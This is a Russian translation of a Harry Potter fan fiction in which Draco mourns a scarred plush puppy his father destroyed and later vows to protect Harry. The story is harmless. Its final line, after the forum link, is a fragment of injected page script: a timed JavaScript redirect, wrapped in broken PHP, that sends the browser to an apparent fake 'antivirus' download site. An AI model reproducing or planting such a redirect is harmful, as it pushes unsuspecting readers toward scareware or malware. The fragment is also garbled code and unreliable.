Подарок на День Рождения.

Автор: tracy loo who.
Перевод ака пересказ: Drake.
Пейринг: как обычно, ГарриДраки
Рейтинг: PG
Архивация: с разрешения автора
Дисклеймер: как обычно

Когда тебе исполняется два года, то среди подарков, полученных на День Рождения, ты обнаруживаешь большой, перевязанный ленточкой сверток. Твой отец объясняет тебе, что Малфоям следует разворачивать свои подарки неторопливо и степенно (недостойно рвать обертку, иначе люди могут подумать, что ты - грязнокровка), и ты с ужасно важным видом взмахиваешь своей крошечной палочкой, произнося заклинание. Когда обёртка слетает на пол, ты видишь плюшевого щенка. Но ты произнес заклинание неточно; из-за этого ткань на лбу игрушки оказалась порванной, и часть ваты вылезла. Тебе кажется, что щенок ранен и из раны течет кровь, потому что раньше ты никогда не видел кровь и не знаешь, что она вовсе не белая и не пушистая.

Первая мысль, которая приходит на ум - нужно выбросить этого плюшевого щенка и потребовать нового, но затем ты смотришь на него, а он смотрит на тебя, и ты относишь его маме.

Она исправляет твою ошибку, но когда ты снова видишь своего щенка, то замечаешь, что теперь вместо раны у него на лбу красуется тонкая, неровная линия, напоминающая шрам (у тебя нет ни одного, но у твоей мамы на коленке есть маленький шрамик; тебе нравится сидя у нее на коленях, гладить его).

Ты пытаешься замаскировать шрам кусочком пергамента, носовым платком и даже носком, но, в конце концов, ты решаешь, что игрушка будет лучше выглядеть без всего этого. Ты называешь своего плюшевого щенка Шрамоголовым.

Тебе четыре года. Однажды утром мама будит тебя и говорит, что тебя ждет новый друг. Ты недоуменно моргаешь, прижимая к себе Шрамоголового (каждую ночь ты спишь в обнимку с ним). Как он может ждать тебя? И он не новый; уже полжизни он твой лучший (и единственный) друг.

Оказывается, что твой новый приятель - упитанный мальчик по имени Грег, который, как ты подозреваешь, является слепым, глухим и немым. Раньше ты никогда не встречался с ровесниками, но Грег вызывает у тебя только раздражение. И когда он садится на Шрамоголового, ты окончательно выходишь из себя.

Ты настолько разозлен, что визжишь как девчонка (хотя ты никогда не слышал, как девчонки визжат) и семь раз тычешь в сторону Грега своей палочкой, прежде чем он, наконец, встает.

Ты проводишь остальную часть этого дня и всю ночь, прижимая Шрамоголового к своей груди, говоря ему ласковые слова и гладя его по голове. Конечно же, в определенный момент времени ты засыпаешь, но проснувшись утром, замечаешь, что Шрамоголовый выглядит уже не таким помятым. Он улыбается тебе, ты тоже улыбаешься и, обняв его, шепчешь: - Доброе утро, Шрамоголовый.

Когда тебе исполняется восемь, ты, так же как и всегда, берешь с собой Шрамоголового в столовую на обед. Отец поджимает губы и говорит, что ты уже достаточно взрослый, чтобы играть с мягкими игрушками. Ты заявляешь ему, что любишь Шрамоголового, а он, в ответ на твою дерзость, сужает глаза. Его палочка поднята, и после того, как он что-то говорит, Шрамоголовый неожиданно дергается. Удивленный, ты выпускаешь его из рук.

Паника. Именно этим словом можно описать твое состояние, когда ты видишь, как Шрамоголовый летит к отцу. Но что ещё хуже, щенок не долетает до него. Отец взмахивает палочкой, и на секунду, по-прежнему глядя на тебя, Шрамоголовый беспомощно зависает в воздухе. Ты мельком видишь его шрам, перед тем как щенка охватывает зеленое пламя и он сгорает.

Закричав, ты бросаешься вперед, но кроме пустого места ничего не осталось; ни дыма, ни падающего пепла. Нет даже пятна на том месте, где уничтожили твоего плюшевого щенка.

Ты ничего не ешь ни в этот день, ни на следующий. Спустя три дня мама наконец-то убеждает тебя подняться с кровати, на которой ты провел все это время, сжавшись в комочек. Но это ничего не значит; ты все еще чувствуешь себя опустошенным, слабым и очень-очень одиноким. Тебе по-прежнему хочется плакать и не хочется двигаться, но ты встаешь и спускаешься вслед за матерью вниз, хоть теперь она и не может помочь твоему горю.

В день, когда тебе исполняется шестнадцать, Поттер спотыкается и падает прямо перед тобой на землю лицом вниз. Его книги и палочка разлетаются в разные стороны, и Грег смеется. Затем он садится на Поттера верхом. Глаза гриффиндорца распахиваются, и даже когда Винс отвешивает ему пинка, Поттер смотрит на тебя.

Ты бросаешь на него взгляд, и в этот момент тебе почему-то кажется, что Гарри Поттер похож на плюшевого щенка.

Рявкнув на Винса, чтобы тот оставался на месте, ты направляешь палочку на Грега. На сей раз тебе не приходится повторять несколько раз. Явно озадаченный, Грег быстро поднимается, но ты смотришь на гриффиндорца.

Поттер дико краснеет и, поправив на носу очки, бормочет тебе спасибо. Он подбирает свои вещи и поспешно удаляется. Ты пытаешься представить, как бы тот выглядел с пушистым черным хвостом.

По прошествии нескольких месяцев, в течение которых вы не только целовались, ты просыпаешься рядом с прижимающимся к тебе Гарри. Его глаза закрыты, он ровно дышит, и ты думаешь, что Гарри полностью доверился тебе. В этот момент ты даешь себе обещание, что на сей раз, защитишь его от всех опасностей. Ты не позволишь ни отцу, ни кому-либо другому уничтожить Гарри.

Его шрам частично скрыт волосами, состояние которых заставляет тебя улыбнуться. Гарри открывает глаза и замечает твою улыбку. Он возится и, зевнув, неловко утыкается лбом в твое плечо. Затем он улыбается тебе, а ты улыбаешься еще сильнее и, обняв его, шепчешь: - Доброе утро, Шрамоголовый.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>